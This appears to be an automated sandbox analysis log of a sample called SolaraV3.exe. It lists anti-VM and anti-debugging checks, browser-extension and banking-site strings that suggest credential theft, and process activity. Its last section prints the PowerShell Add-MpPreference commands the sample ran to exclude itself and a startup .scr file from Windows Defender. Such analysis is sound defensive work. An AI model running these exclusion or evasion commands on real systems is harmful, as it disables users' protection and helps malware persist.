Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 5225 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 4076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep count: 284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtrayZ
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svchost.exe, 0000001A.00000002.2809507862.000001407B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811395049.000001407C854000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvcZ
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvcZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MW
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxserviceZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: SolaraV3.exe, 00000002.00000003.1920657343.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2042793103.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1767469686.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1919694922.000001FC2612A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2045845216.000001FC2611B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1579360087.000001FC25402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuserZ
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-gaZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwarec
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretrayZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-Vf
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer5Z
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815731		2_2_00007FFB0B815731
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814246		2_2_00007FFB0B814246

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF6DC71A614

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC723480 GetProcessHeap,

1_2_00007FF6DC723480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	1_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70D30C SetUnhandledExceptionFilter,	2_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFB0B815A24
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3C0376 SetUnhandledExceptionFilter,	2_2_00007FFB0C3C0376
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EED4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	110_2_00007FF74EECB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECB6D8 SetUnhandledExceptionFilter,	110_2_00007FF74EECB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	110_2_00007FF74EECA66C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
